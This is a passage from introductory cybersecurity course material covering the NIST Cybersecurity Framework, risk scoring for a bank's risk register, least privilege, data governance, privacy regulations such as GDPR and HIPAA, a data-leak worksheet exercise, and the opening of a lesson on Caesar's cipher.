that it's flexible and can be applied to any industry. In this reading, you’ll explore how the NIST CSF can
be implemented.
Origins of the framework
Originally released in 2014, NIST developed the Cybersecurity Framework to protect critical
infrastructure in the United States. NIST was selected to develop the CSF because they are an unbiased
source of scientific data and practices. NIST eventually adapted the CSF to fit the needs of businesses in
the public and private sector. Their goal was to make the framework more flexible, making it easier to
adopt for small businesses or anyone else that might lack the resources to develop their own security
plans.
Components of the CSF
As you might recall, the framework consists of three main components: the core, tiers, and profiles. In
the following sections, you'll learn more about each of these CSF components.
Core
The CSF core is a set of desired cybersecurity outcomes that help organizations customize their security
plan. It consists of five functions, or parts: Identify, Protect, Detect, Respond, and Recover. These functions
are commonly used as an informative reference to help organizations identify their most important assets
and protect those assets with appropriate safeguards. The CSF core is also used to understand ways to
detect attacks and develop response and recovery plans should an attack happen.
Tiers
The CSF tiers are a way of measuring the sophistication of an organization's cybersecurity program. CSF
tiers are measured on a scale of 1 to 4. Tier 1 is the lowest score, indicating that a limited set of security
controls have been implemented. Overall, CSF tiers are used to assess an organization's security posture
and identify areas for improvement.
Profiles
The CSF profiles are pre-made templates of the NIST CSF that are developed by a team of industry
experts. CSF profiles are tailored to address the specific risks of an organization or industry. They are
used to help organizations develop a baseline for their cybersecurity plans, or as a way of comparing
their current cybersecurity posture to a specific industry standard.
Note: The core, tiers, and profiles were each designed to help any business improve their security
operations. Although there are only three components, the entire framework consists of a complex
system of subcategories and processes.
Implementing the CSF
As you might recall, compliance is an important concept in security. Compliance is the process of
adhering to internal standards and external regulations. In other words, compliance is a way of
measuring how well an organization is protecting their assets. The NIST Cybersecurity Framework (CSF)
is a voluntary framework that consists of standards, guidelines, and best practices to manage
cybersecurity risk. Organizations may choose to use the CSF to achieve compliance with a variety of
regulations.
Note: Regulations are rules that must be followed, while frameworks are resources you can choose to
use.
Since its creation, many businesses have used the NIST CSF. However, CSF can be a challenge to
implement due to its high level of detail. It can also be tough to find where the framework fits in. For
example, some businesses have established security plans, making it unclear how CSF can benefit them.
Alternatively, some businesses might be in the early stages of building their plans and need a place to
start.
In any scenario, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) provides detailed
guidance that any organization can use to implement the CSF. This is a quick overview and summary of
their recommendations:
●
●
●
●
Create a current profile of the security operations and outline the specific needs of your
business.
Perform a risk assessment to identify which of your current operations are meeting business and
regulatory standards.
Analyze and prioritize existing gaps in security operations that place the businesses assets at
risk.
Implement a plan of action to achieve your organization’s goals and objectives.
Pro tip: Always consider current risk, threat, and vulnerability trends when using the NIST
CSF.
You can learn more about implementing the CSF in this report by CISA that outlines how the framework
was applied in the commercial facilities sector.
Industries embracing the CSF
The NIST CSF has continued to evolve since its introduction in 2014. Its design is influenced by the
standards and best practices of some of the largest companies in the world.
A benefit of the framework is that it aligns with the security practices of many organizations across the
global economy. It also helps with regulatory compliance that might be shared by business partners.
Key takeaways
The NIST CSF is a flexible resource that organizations may choose to use to assess and improve their
security posture. It's a useful framework that combines the security best practices of industries around
the world. Implementing the CSF can be a challenge for any organization. The CSF can help business
meet regulatory compliance requirements to avoid financial and reputational risks.
Activity: Score risks based on their likelihood and severity
Activity Overview
In this activity, you will practice performing a risk assessment by evaluating vulnerabilities
that commonly threaten business operations. Then, you will decide how to prioritize your
resources based on the risk scores you assign each vulnerability.
You might recall that the purpose of having a security plan is to be prepared for risks.
Assessing potential risks is one of the first steps of the NIST Cybersecurity Framework
(CSF), a voluntary framework that consists of standards, guidelines, and best practices to
manage cybersecurity risk. Risk assessments are how security teams determine whether
their security operations are adequately positioned to prevent cyber attacks and protect
sensitive information.
Be sure to complete this activity before moving on. The next course item will provide you
with a completed exemplar to compare to your own work.
Scenario
Review the following scenario. Then complete the step-by-step instructions.
You've joined a new cybersecurity team at a commercial bank. The team is conducting a
risk assessment of the bank's current operational environment. As part of the assessment,
they are creating a risk register to help them focus on securing the most vulnerable risks.
A risk register is a central record of potential risks to an organization's assets, information
systems, and data. Security teams commonly use risk registers when conducting a risk
assessment.
Your supervisor asks you to evaluate a set of risks that the cybersecurity team has recorded
in the risk register. For each risk, you will first determine how likely that risk is to occur.
Then, you will determine how severely that risk may impact the bank. Finally, you will
calculate a score for the severity of that risk. You will then compare scores across all risks
so your team can determine how to prioritize their attention for each risk.
Step 1: Access the template
Link to template: Risk register
Step 2: Understand the operating environment
When conducting a risk assessment, it's important to consider the factors that could cause
a security event. This often starts with understanding the operating environment.
In this scenario, your team has identified characteristics of the operating environment that
could factor into the bank's risk profile:
The bank is located in a coastal area with low crime rates. Many people and systems handle
the bank's data—100 on-premise employees and 20 remote employees. The customer base
of the bank includes 2,000 individual accounts and 200 commercial accounts. The bank's
services are marketed by a professional sports team and ten local businesses in the
community. There are strict financial regulations that require the bank to secure their data
and funds, like having enough cash available each day to meet Federal Reserve
requirements.
Step 3: Consider potential risks to assets
Security events are possible when assets are at risk. The source of a risk can range from
malicious attackers to accidental human errors. A risk source can even come from natural
or environmental hazards, such as a structural failure or power outage.
The bank's funds are one of its key assets. Your team has listed five primary risks to the
bank's funds:
●
●
Business email compromise
Compromised user database
●
●
●
Financial records leak
Theft
Supply chain attack
Consider these potential risks in relation to the bank's operating environment. Then, write
2-3 sentences (40-60 words) in the Notes area of the template describing how security
events are possible considering the risks facing the funds in this operating environment.
Step 4: Score risks based on their likelihood
As you might recall, risk can be calculated with this simple formula:
Likelihood x Impact = Risk
To calculate the score for a security risk, you must first estimate and score the likelihood of
the risk causing a security event. The likelihood of a risk can be based on available
evidence, prior experience, or expert judgment. A common way to estimate the likelihood
of the risk is to determine the potential frequency of the risk occurring:
●
●
●
Could the risk happen once a day?
Could the risk happen once a month?
Could the risk happen once in a year?
For example, the bank must have enough funds available each day to meet its legal
requirements. A potential risk that could prevent the bank from replenishing its funds is a
supply chain disruption. Being in a coastal area, there's a likelihood that the bank may
experience supply chain disruptions caused by hurricanes. However, a hurricane might
only impact the bank every few years, so you can score the likelihood as low.
In this instance, the team is scoring the likelihood of an event on a scale of 1-3:
●
●
●
1 represents an event with a low chance of occuring.
2 represents an event with a moderate chance of occuring.
3 represents a high chance of occuring.
Review the Risk(s), Description, and Notes of the risk register template. Refer to the risk
matrix and use it to estimate a likelihood score for each risk. Then, enter a score (1-3) for
each risk in the Likelihood column of the register.
Step 5: Score risks based on their severity
A severity score is an estimate of the overall impact that might occur as a result of an event.
For example, damage can occur to a company's reputation or finances and there may be a
loss of data, customers, or assets. Evaluating the severity of a risk helps businesses
determine the level of risk they can tolerate and how assets might be affected.
When evaluating the severity of a risk, consider the potential consequences of that risk
occurring:
●
●
●
●
●
How would the business be affected?
What's the financial harm to the business and its customers?
Can important operations or services be impacted?
Are there regulations that can be violated?
What is the reputational damage to the company's standing?
Use the top row of the risk matrix and consider the potential impact of each risk. Estimate a
severity score for each risk. Then, enter a score (1-3) for each risk in the Severity column of
the register:
●
●
●
1 (low severity)
2 (moderate severity)
3 (high severity)
For example, a leak of financial records might lead to a loss of profits, a loss of customers,
and heavy regulatory fines. A risk such as this might receive a severity score of 3 because it
greatly impacts the bank's ability to operate.
Step 6: Calculate an overall risk score
Ultimately, the goal of performing a risk assessment is to help security teams prioritize
their efforts and resources.
Using the risk formula, multiply the likelihood and severity score for each risk. Then, enter
a priority score (1-9) for each of the risks in the Priority column of the register.
What to Include in Your Response
Be sure to address the following criteria in your completed activity:
●
●
●
●
2-3 sentences describing the risk factors
5 likelihood scores
5 severity scores
5 overall risk scores
Assessment of Exemplar
Compare the exemplar to your completed activity. Review your work using each of the
criteria in the exemplar. What did you do well? Where can you improve? Use your answers
to these questions to guide you as you continue to progress through the course.
Note: The exemplar represents one possible way to complete the activity. Yours will likely
differ in certain ways. What’s important is that you've considered how likelihood and
impact affect how organizations approach risk management.
Next, you can review the results of a completed risk register:
Notes
Some risk factors to have considered might have been the number of other companies that
interact with the bank. These sources of risk might introduce incidents beyond the bank's
control. Also, the risk of theft is important to consider because of the number of customers
and the operational impact it could have to the business.
Likelihood
A range of likelihood scores were estimated based on factors that could lead to a security
incident. Each risk was scored as a 1, 2, or 3 on a risk matrix, meaning the chances of
occurring were rare, likely, or certain. A supply chain attack caused by natural disaster was
scored with a 1, meaning it was regarded as unlikely due to the unpredictability of those
events. On the other hand, compromised data events were scored a 2 because they are
likely to occur given the possible causes.
Severity
No risk received a severity score less than 2 because risks that involve data breaches such
as business email compromise, can have serious consequences. Customers at a bank trust
the businesses to protect their money and personal information. Also, the bank's
operations could be terminated if they fail to comply with regulations.
Priority
A financial records leak received the highest overall risk score of 9. This indicates that this
risk is almost certain to happen and would greatly impact the bank's ability to operate.
Such a high overall score signals the security team to prioritize remediating, or resolving
any issues related to that risk before moving on to risks that scored lower.
Key takeaways
Risk assessments are useful for identifying risks to an organization’s information, networks
and systems. Security plans can benefit from regular risk assessments as a way of
highlighting important concerns that should be addressed. Additionally, these assessments
help keep track of any changes that can occur in an organization's operating environment.
Glossary terms from module 1
Terms and definitions from Course 5, Module 1
Asset: An item perceived as having value to an organization
Asset classification: The practice of labeling assets based on sensitivity and importance to an
organization
Asset inventory: A catalog of assets that need to be protected
Asset management: The process of tracking assets and the risks that affect them
Compliance: The process of adhering to internal standards and external regulations
Data: Information that is translated, processed, or stored by a computer
Data at rest: Data not currently being accessed
Data in transit: Data traveling from one point to another
Data in use: Data being accessed by one or more users
Information security (InfoSec): The practice of keeping data in all states away from unauthorized users
National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF): A voluntary
framework that consists of standards, guidelines, and best practices to manage cybersecurity risk
Policy: A set of rules that reduce risk and protect information
Procedures: Step-by-step instructions to perform a specific security task
Regulations: Rules set by a government or other authority to control the way something is done
Risk: Anything that can impact confidentiality, integrity, or availability of an asset
Standards: References that inform how to set policies
Threat: Any circumstance or event that can negatively impact assets
Vulnerability: A weakness that can be exploited by a threat
Module 2 – Security Controls
These days, information is in so many places at once. As a result, organizations are under
a lot of pressure to implement effective security controls that protects everyone's
information from being stolen or exposed. Security controls are safeguards designed
to reduce specific security risks. They include a wide range of tools that
protect assets before, during, and after an event. Security controls can be
organized into three types: technical, operational, and managerial. Technical control types include the
many technologies used to protect assets. This includes encryption, authentication systems, and
others. Operational controls relate to maintaining the day-to-day security environment. Generally,
people perform these controls like awareness training and incident response. Managerial controls are
centered around how the other two reduce risk. Examples of management controls include policies,
standards, and procedures. Typically, an organization's security policy outlines the controls needed
to achieve their goals. Information privacy plays a key role in these decisions. Information privacy
is the protection of unauthorized access and distribution of data. Information privacy is
about the right to choose. People and organizations alike deserve the right to decide when, how,
and to what extent private information about them is shared. Security controls are the technologies
used to regulate information privacy. For example, imagine using
a travel app to book a flight. You might browse through a list of flights and find one at a good price.
To reserve a seat, you enter some personal information, like your name, email, and credit card
number for payment. The transaction goes through successfully, and you booked your flight. Now,
you reasonably expect the airline company to access this information you enter when signing up to
complete the reservation. However, should everyone at the company
have access to your information? A person working in the marketing department shouldn't need
access to your credit card information. It makes sense to share that information with a customer
support agent. Except, they should only need to access it while helping with your reservation. To
maintain privacy, security controls are intended to limit access based on the user and situation. This
is known as the principle of least privilege. Security controls should be designed with the principle
of least privilege in mind. When they are, they rely on
differentiating between data owners and data custodians. A data owner is a person who decides who
can access, edit, use, or destroy their information. The idea is very straightforward except in cases
where there are multiple owners. For example, the intellectual property of an organization can have
multiple data owners. A data custodian is anyone or anything that's responsible for the safe handling,
transport, and storage of information. Did you notice that I mentioned, "anything?" That's because,
aside from people, organizations and their systems are also custodians of people's information.
There are other considerations besides these when implementing security controls. Remember that
data is an asset. Like any other asset, information privacy requires proper classification and
handling. As we progress in this section, we'll continue exploring other security controls that make
this possible.
Principle of least privilege
Security controls are essential to keeping sensitive data private and safe. One of the most common
controls is the principle of least privilege, also referred to as PoLP or least privilege. The principle of
least privilege is a security concept in which a user is only granted the minimum level of access and
authorization required to complete a task or function.
Least privilege is a fundamental security control that supports the confidentiality, integrity, and
availability (CIA) triad of information. In this reading, you'll learn how the principle of least privilege
reduces risk, how it's commonly implemented, and why it should be routinely audited.
Limiting access reduces risk
Every business needs to plan for the risk of data theft, misuse, or abuse. Implementing the principle of
least privilege can greatly reduce the risk of costly incidents like data breaches by:
●
●
●
Limiting access to sensitive information
Reducing the chances of accidental data modification, tampering, or loss
Supporting system monitoring and administration
Least privilege greatly reduces the likelihood of a successful attack by connecting specific resources to
specific users and placing limits on what they can do. It's an important security control that should be
applied to any asset. Clearly defining who or what your users are is usually the first step of
implementing least privilege effectively.
Note: Least privilege is closely related to another fundamental security principle, the separation of
duties—a security concept that divides tasks and responsibilities among different users to prevent
giving a single user complete control over critical business functions. You'll learn more about separation
of duties in a different reading about identity and access management.
Determining access and authorization
To implement least privilege, access and authorization must be determined first. There are two
questions to ask to do so:
●
●
Who is the user?
How much access do they need to a specific resource?
Determining who the user is usually straightforward. A user can refer to a person, like a customer, an
employee, or a vendor. It can also refer to a device or software that's connected to your business
network. In general, every user should have their own account. Accounts are typically stored and
managed within an organization's directory service.
These are the most common types of user accounts:
●
●
●
●
Guest accounts are provided to external users who need to access an internal network, like
customers, clients, contractors, or business partners.
User accounts are assigned to staff based on their job duties.
Service accounts are granted to applications or software that needs to interact with other
software on the network.
Privileged accounts have elevated permissions or administrative access.
It's best practice to determine a baseline access level for each account type before implementing least
privilege. However, the appropriate access level can change from one moment to the next. For example,
a customer support representative should only have access to your information while they are helping
you. Your data should then become inaccessible when the support agent starts working with another
customer and they are no longer actively assisting you. Least privilege can only reduce risk if user
accounts are routinely and consistently monitored.
Pro tip: Passwords play an important role when implementing the principle of least privilege. Even if
user accounts are assigned appropriately, an insecure password can compromise your systems.
Auditing account privileges
Setting up the right user accounts and assigning them the appropriate privileges is a helpful first step.
Periodically auditing those accounts is a key part of keeping your company’s systems secure.
There are three common approaches to auditing user accounts:
●
●
●
Usage audits
Privilege audits
Account change audits
As a security professional, you might be involved with any of these processes.
Usage audits
When conducting a usage audit, the security team will review which resources each account is accessing
and what the user is doing with the resource. Usage audits can help determine whether users are acting
in accordance with an organization’s security policies. They can also help identify whether a user has
permissions that can be revoked because they are no longer being used.
Privilege audits
Users tend to accumulate more access privileges than they need over time, an issue known as privilege
creep. This might occur if an employee receives a promotion or switches teams and their job duties
change. Privilege audits assess whether a user's role is in alignment with the resources they have access
to.
Account change audits
Account directory services keep records and logs associated with each user. Changes to an account are
usually saved and can be used to audit the directory for suspicious activity, like multiple attempts to
change an account password. Performing account change audits helps to ensure that all account changes
are made by authorized users.
Note: Most directory services can be configured to alert system administrators of suspicious activity.
Key takeaways
The principle of least privilege is a security control that can reduce the risk of unauthorized access to
sensitive information and resources. Setting up and configuring user accounts with the right levels of
access and authorization is an important step toward implementing least privilege. Auditing user
accounts and revoking unnecessary access rights is an important practice that helps to maintain the
confidentiality, integrity, and availability of information.
The data lifecycle
Organizations of all sizes handle a large amount of data that must be kept private. You learned that data
can be vulnerable whether it is at rest, in use, or in transit. Regardless of the state it is in, information
should be kept private by limiting access and authorization.
In security, data vulnerabilities are often mapped in a model known as the data lifecycle. Each stage of
the data lifecycle plays an important role in the security controls that are put in place to maintain the
CIA triad of information. In this reading, you will learn about the data lifecycle, the plans that determine
how data is protected, and the specific types of data that require extra attention.
The data lifecycle
The data lifecycle is an important model that security teams consider when protecting information. It
influences how they set policies that align with business objectives. It also plays an important role in the
technologies security teams use to make information accessible.
In general, the data lifecycle has five stages. Each describe how data flows through an organization from
the moment it is created until it is no longer useful:
●
●
●
●
●
Collect
Store
Use
Archive
Destroy
Protecting information at each stage of this process describes the need to keep it accessible and
recoverable should something go wrong.
Data governance
Businesses handle massive amounts of data every day. New information is constantly being collected
from internal and external sources. A structured approach to managing all of this data is the best way to
keep it private and secure.
Data governance is a set of processes that define how an organization manages information. Governance
often includes policies that specify how to keep data private, accurate, available, and secure throughout
its lifecycle.
Effective data governance is a collaborative activity that relies on people. Data governance policies
commonly categorize individuals into a specific role:
●
●
●
Data owner: the person that decides who can access, edit, use, or destroy their information.
Data custodian: anyone or anything that's responsible for the safe handling, transport, and
storage of information.
Data steward: the person or group that maintains and implements data governance policies set
by an organization.
Businesses store, move, and transform data using a wide range of IT systems. Data governance policies
often assign accountability to data owners, custodians, and stewards.
Note: As a data custodian, you will primarily be responsible for maintaining security and privacy rules
for your organization.
Protecting data at every stage
Most security plans include a specific policy that outlines how information will be managed across an
organization. This is known as a data governance policy. These documents clearly define procedures
that should be followed to participate in keeping data safe. They place limits on who or what can access
data. Security professionals are important participants in data governance. As a data custodian, you will
be responsible for ensuring that data isn’t damaged, stolen, or misused.
Legally protected information
Data is more than just a bunch of 1s and 0s being processed by a computer. Data can represent
someone's personal thoughts, actions, and choices. It can represent a purchase, a sensitive medical
decision, and everything in between. For this reason, data owners should be the ones deciding whether
or not to share their data. As a security professional, protecting a person's data privacy decisions must
always be respected.
Securing data can be challenging. In large part, that's because data owners generate more data than they
can manage. As a result, data custodians and stewards sometimes lack direct, explicit instructions on
how they should handle specific types of data. Governments and other regulatory agencies have bridged
this gap by creating rules that specify the types of information that organizations must protect by
default:
●
●
●
PII is any information used to infer an individual's identity. Personally identifiable information,
or PII, refers to information that can be used to contact or locate someone.
PHI stands for protected health information. In the U.S., it is regulated by the Health Insurance
Portability and Accountability Act (HIPAA), which defines PHI as “information that relates to the
past, present, or future physical or mental health or condition of an individual.” In the EU, PHI
has a similar definition but it is regulated by the General Data Protection Regulation (GDPR).
SPII is a specific type of PII that falls under stricter handling guidelines. The S stands for
sensitive, meaning this is a type of personally identifiable information that should only be
accessed on a need-to-know basis, such as a bank account number or login credentials.
Overall, it's important to protect all types of personal information from unauthorized use and disclosure.
Key takeaways
Keeping information private has never been so important. Many organizations have data governance
policies that outline how they plan to protect sensitive information. As a data custodian, you will play a
key role in keeping information accessible and safe throughout its lifecycle. There are various types of
information and controls that you’ll encounter in the field. As you continue through this course, you’ll
learn more about major security controls that keep data private.
Information privacy: Regulations and
compliance
Security and privacy have a close relationship. As you may recall, people have the right to control how
their personal data is collected and used. Organizations also have a responsibility to protect the
information they are collecting from being compromised or misused. As a security professional, you will
be highly involved in these efforts.
Previously, you learned how regulations and compliance reduce security risk. To review, refer to the
reading about how security controls, frameworks, and compliance regulations are used together to
manage security and minimize risk. In this reading, you will learn how information privacy regulations
affect data handling practices. You'll also learn about some of the most influential security regulations in
the world.
Information security vs. information privacy
Security and privacy are two terms that often get used interchangeably outside of this field. Although the
two concepts are connected, they represent specific functions:
●
●
Information privacy refers to the protection of unauthorized access and distribution of data.
Information security (InfoSec) refers to the practice of keeping data in all states away from
unauthorized users.
The key difference: Privacy is about providing people with control over their personal information and
how it's shared. Security is about protecting people’s choices and keeping their information safe from
potential threats.
For example, a retail company might want to collect specific kinds of personal information about its
customers for marketing purposes, like their age, gender, and location. How this private information will
be used should be disclosed to customers before it's collected. In addition, customers should be given an
option to opt-out if they decide not to share their data.
Once the company obtains consent to collect personal information, it might implement specific security
controls in place to protect that private data from unauthorized access, use, or disclosure. The company
should also have security controls in place to respect the privacy of all stakeholders and anyone who
chose to opt-out.
Note: Privacy and security are both essential for maintaining customer trust and brand reputation.
Why privacy matters in security
Data privacy and protection are topics that started gaining a lot of attention in the late 1990s. At that
time, tech companies suddenly went from processing people’s data to storing and using it for business
purposes. For example, if a user searched for a product online, companies began storing and sharing
access to information about that user’s search history with other companies. Businesses were then able
to deliver personalized shopping experiences to the user for free.
Eventually this practice led to a global conversation about whether these organizations had the right to
collect and share someone’s private data. Additionally, the issue of data security became a greater
concern; the more organizations collected data, the more vulnerable it was to being abused, misused, or
stolen.
Many organizations became more concerned about the issues of data privacy. Businesses became more
transparent about how they were collecting, storing, and using information. They also began
implementing more security measures to protect people's data privacy. However, without clear rules in
place, protections were inconsistently applied.
Note: The more data is collected, stored, and used, the more vulnerable it is to breaches and threats.
Notable privacy regulations
Businesses are required to abide by certain laws to operate. As you might recall, regulations are rules set
by a government or another authority to control the way something is done. Privacy regulations in
particular exist to protect a user from having their information collected, used, or shared without their
consent. Regulations may also describe the security measures that need to be in place to keep private
information away from threats.
Three of the most influential industry regulations that every security professional should know about
are:
●
●
●
General Data Protection Regulation (GDPR)
Payment Card Industry Data Security Standard (PCI DSS)
Health Insurance Portability and Accountability Act (HIPAA)
GDPR
GDPR is a set of rules and regulations developed by the European Union (EU) that puts data owners in
total control of their personal information. Under GDPR, types of personal information include a
person's name, address, phone number, financial information, and medical information.
The GDPR applies to any business that handles the data of EU citizens or residents, regardless of where
that business operates. For example, a US based company that handles the data of EU visitors to their
website is subject to the GDPRs provisions.
PCI DSS
PCI DSS is a set of security standards formed by major organizations in the financial industry. This
regulation aims to secure credit and debit card transactions against data theft and fraud.
HIPAA
HIPAA is a U.S. law that requires the protection of sensitive patient health information. HIPAA prohibits
the disclosure of a person's medical information without their knowledge and consent.
Note: These regulations influence data handling at many organizations around the world even though
they were developed by specific nations.
Several other security and privacy compliance laws exist. Which ones your organization needs to follow
will depend on the industry and the area of authority. Regardless of the circumstances, regulatory
compliance is important to every business.
Security assessments and audits
Businesses should comply with important regulations in their industry. Doing so validates that they
have met a minimum level of security while also demonstrating their dedication to maintaining data
privacy.
Meeting compliance standards is usually a continual, two-part process of security audits and
assessments:
●
●
A security audit is a review of an organization's security controls, policies, and procedures
against a set of expectations.
A security assessment is a check to determine how resilient current security implementations
are against threats.
For example, if a regulation states that multi-factor authentication (MFA) must be enabled for all
administrator accounts, an audit might be conducted to check those user accounts for compliance. After
the audit, the internal team might perform a security assessment that determines many users are using
weak passwords. Based on their assessment, the team could decide to enable MFA on all user accounts
to improve their overall security posture.
Note: Compliance with legal regulations, such as GDPR, can be determined during audits.
As a security analyst, you are likely to be involved with security audits and assessments in the field.
Businesses usually perform security audits less frequently, approximately once per year. Security audits
may be performed both internally and externally by different third-party groups.
In contrast, security assessments are usually performed more frequently, about every three-to-six
months. Security assessments are typically performed by internal employees, often as preparation for a
security audit. Both evaluations are incredibly important ways to ensure that your systems are
effectively protecting everyone's privacy.
Key takeaways
A growing number of businesses are making it a priority to protect and govern the use of sensitive data
to maintain customer trust. Security professionals should think about data and the need for privacy in
these terms. Organizations commonly use security assessments and audits to evaluate gaps in their
security plans. While it is possible to overlook or delay addressing the results of an assessment, doing so
can have serious business consequences, such as fines or data breaches.
Hello, my name is Heather and I'm the Vice President of Security Engineering at Google. PII is
everywhere. It's a fundamental part of how we are all working online all the time. If you are using online
resources, you are probably putting your PII out there somewhere. There's some of your PII that lots of
people know, such as your name. And then there's sensitive data that you don't want very many people
to know, such as your bank account number or your private medical health information. And so, we
make these distinctions often because this kind of information needs to be handled differently.
Everything that we do now, from school to voting, to registering our car happens online. And because of
that, it's so important that we have safety built-in by default into all our systems. Here's some tips. You
should always encrypt the data as much as you can when it's being stored at rest. And secondly, when
it's transmitting over the Internet, we always want to encrypt it using TLS or SSL. Third, within your
company, you should think very clearly about who has access to that data. It should be almost no one if
it's very sensitive. And in the rare cases where somebody does need to access that data, there should be
a record of that access, who accessed it, and a justification as to why. And you should have a program to
look at the audit records for that data. The most important thing to remember is if you have a situation
where PII has been compromised, remember that's someone's personal information and your response
wants to be grounded in that reality. They need to be able to trust the infrastructure, the systems, the
websites, the devices. They need to be able to trust the experience they're having. For me, that's the
mission: To help keep billions of people safe online every day.
Activity Overview
In this activity, you will review the results of a data risk assessment. You will determine whether
effective data handling processes are being implemented to protect information privacy.
Data is among the most valuable assets in the world today. Everything from intellectual property to
guest WiFi networks should be protected with a combination of technical, operational, and managerial
controls. Implementing the principle of least privilege is essential to protect information privacy.
Be sure to complete this activity before moving on. The next course item will provide you with a
completed exemplar to compare to your own work.
Scenario
Review the following scenario. Then complete the step-by-step instructions.
You work for an educational technology company that developed an application to help teachers
automatically grade assignments. The application handles a wide range of data that it collects from
academic institutions, instructors, parents, and students.
Your team was alerted to a data leak of internal business plans on social media. An investigation by the
team discovered that an employee accidentally shared those confidential documents with a customer.
An audit into the leak is underway to determine how similar incidents can be avoided.
A supervisor provided you with information regarding the leak. It appears that the principle of least
privilege was not observed by employees at the company during a sales meeting. You have been asked
to analyze the situation and find ways to prevent it from happening again.
First, you'll need to evaluate details about the incident. Then, you'll review the controls in place to
prevent data leaks. Next, you'll identify ways to improve information privacy at the company. Finally,
you'll justify why you think your recommendations will make data handling at the company more
secure.
Link to template: Data leak worksheet
Step 2: Analyze the situation
The principle of least privilege is a fundamental security control that helps maintain information
privacy. However, least privilege starts to lose its effectiveness when too many users are given access to
information. Data leaks commonly happen as information gets passed between people without
oversight.
To start your analysis, review the following incident summary provided by your supervisor:
A customer success representative received access to a folder of internal documents from a manager. It
contained files associated with a new product offering, including customer analytics and marketing
materials. The manager forgot to unshare the folder. Later, the representative copied a link to the
marketing materials to share with a customer during a sales call. Instead, the representative shared a
link to the entire folder. During the sales call, the customer received the link to internal documents and
posted it to their social media page.
After reviewing the summary, write 20-60 words (2-3 sentences) in the Issue(s) row of the Data leak
worksheet describing the factors that led to the data leak.
Step 3: Review current data privacy controls
Data leaks are a major risk due to the amount of data handled by the application. The
company used the NIST Cybersecurity Framework (CSF) to develop their plan for
addressing their information privacy concerns.
Review the Security plan snapshot resource of the worksheet. Then, review the NIST SP
800-53: AC-6 resource of the worksheet.
After, write 20-60 words (2-3 sentences) in the Review row of the Data leak worksheet to
summarize what you've learned about NIST SP 800-53: AC-6.
Step 4: Identify control enhancements
The company's implementation of least privilege is based on NIST Special Publication 80053 (SP 800-53). NIST developed SP 800-53 to provide businesses with a customizable
information privacy plan. It's a comprehensive resource that describes a wide range of
control categories, including least privilege.
Use the NIST SP 800-53: AC-6 resource to determine two control enhancements that might
have prevented the data leak. List the two improvements in the Recommendation(s) row of
the worksheet.
Step 5: Justify your recommendations
At the end of your analysis, it's time to communicate your findings to your supervisor. It's
important to justify your recommendations so that the supervisor can relay this
information to other decision makers at the company.
Consider the issues you identified earlier. Then, write 20-60 words (2-3 sentences) in the
Justification row describing why you think the control enhancements you recommend will
reduce the likelihood of another data leak.
What to Include in Your Response
Be sure to address the following elements in your completed activity:
●
●
●
●
2-3 sentences analyzing the factors that led to the incident
2-3 sentences summarizing NIST SP 800-53: AC-6
2 control enhancement recommendations to improve least privilege
2-3 sentences justifying your recommendations
NIST SP 800-53: AC-6
NIST developed SP 800-53 to provide businesses with a customizable information privacy plan. It's a
comprehensive resource that describes a wide range of control categories. Each control provides a few key
pieces of information:
● Control: A definition of the security control.
● Discussion: A description of how the control should be implemented.
● Control enhancements: A list of suggestions to improve the effectiveness of the control.
AC-6 Least Privilege
Control:
Only the minimal access and authorization required to complete a task or function should
be provided to users.
Discussion:
Processes, user accounts, and roles should be enforced as necessary to achieve least
privilege. The intention is to prevent a user from operating at privilege levels higher than
what is necessary to accomplish business objectives.
Control enhancements:
● Restrict access to sensitive resources based on user role.
● Automatically revoke access to information after a period of time.
● Keep activity logs of provisioned user accounts.
● Regularly audit user privileges.
Data leak worksheet
Incident summary: A sales manager shared access to a folder of internal-only documents with their team
during a meeting. The folder contained files associated with a new product that has not been publicly
announced. It also included customer analytics and promotional materials. After the meeting, the manager
did not revoke access to the internal folder, but warned the team to wait for approval before sharing the
promotional materials with others.
During a video call with a business partner, a member of the sales team forgot the warning from their
manager. The sales representative intended to share a link to the promotional materials so that the
business partner could circulate the materials to their customers. However, the sales representative
accidentally shared a link to the internal folder instead. Later, the business partner posted the link on their
company's social media page assuming that it was the promotional materials.
Control
Least privilege
Issue(s)
Access to the internal folder was not limited to the sales team and the
manager. The business partner should not have been given permission to
share the promotional information to social media.
Review
NIST SP 800-53: AC-6 addresses how an organization can protect their data
privacy by implementing least privilege. It also suggests control
enhancements to improve the effectiveness of least privilege.
Recommendation(s
)
●
●
Restrict access to sensitive resources based on user role.
Regularly audit user privileges.
Justification
Data leaks can be prevented if shared links to internal files are restricted to
employees only. Also, requiring managers and security teams to regularly
audit access to team files would help limit the exposure of sensitive
information.
Fundamentals of Cryptography
The internet is an open, public system with a lot of data flowing through it. Even though we all send
and store information online, there's some information that
we choose to keep private. In security, this type of data is known
as personally identifiable information. Personally identifiable information, or
PII, is any information that can be used to infer an individual's identity. This can include things like
someone's name, medical and financial information, photos,
emails, or fingerprints. Maintaining the privacy of PII online is difficult. It takes the right security
controls to do so. One of the main security controls used to protect information online is
cryptography. Cryptography is the process of transforming information into a form that unintended
readers can't understand. Data of any kind is kept secret using a two-step process: encryption to
hide the information, and decryption to unhide it. Imagine sending an email to a friend. The process
starts by taking data in its original and readable form, known as plaintext. Encryption takes that
information and scrambles it into an unreadable form, known as ciphertext. We then use
decryption to unscramble the ciphertext back into plaintext form, making it readable again. Hiding
and unhiding private information is a practice that's been around for a long time. Way before
computers! One of the earliest cryptographic methods is known as Caesar's cipher. This method is
named after a Roman general, Julius Caesar, who ruled the Roman empire near the end of the first
century BC. He used it to keep messages between him and his military generals private. Caesar's
cipher is a simple algorithm
that works by shifting letters in the Roman alphabet forward by a fixed number of spaces. An
algorithm is a set of rules that solve a problem. Specifically in cryptography, a cipher is an algorithm
that encrypts information. For example, a message encoded with Caesar's cipher using a shift of 3
would encode an A as a D, a B as an E, a C as an F, and so on. In this example, you could send a friend
a message that said, "hello" using a shift of 3, and it would read "khoor." Now, you might be
wondering how would you know the shift a message encrypted with Caesar's cipher is using. The
answer to that is, you need the key! A cryptographic key is a mechanism that decrypts ciphertext. In
our example, the key would tell you that my message is encrypted by 3 shifts. With that
information, you can unlock the hidden message! Every form of encryption relies on both a cipher
and key to secure the exchange of information. Caesar's cipher is not widely used today because of a
couple of major flaws. One concerns the cipher itself. The other relates to the key. This cipher relies
entirely on the characters of the Roman alphabet to hide information. For example, consider a
message written using the English alphabet, which is only 26 characters. Even without the key, it's
simple to crack a message secured with Caesar's cipher by shifting letters 26 different ways. In
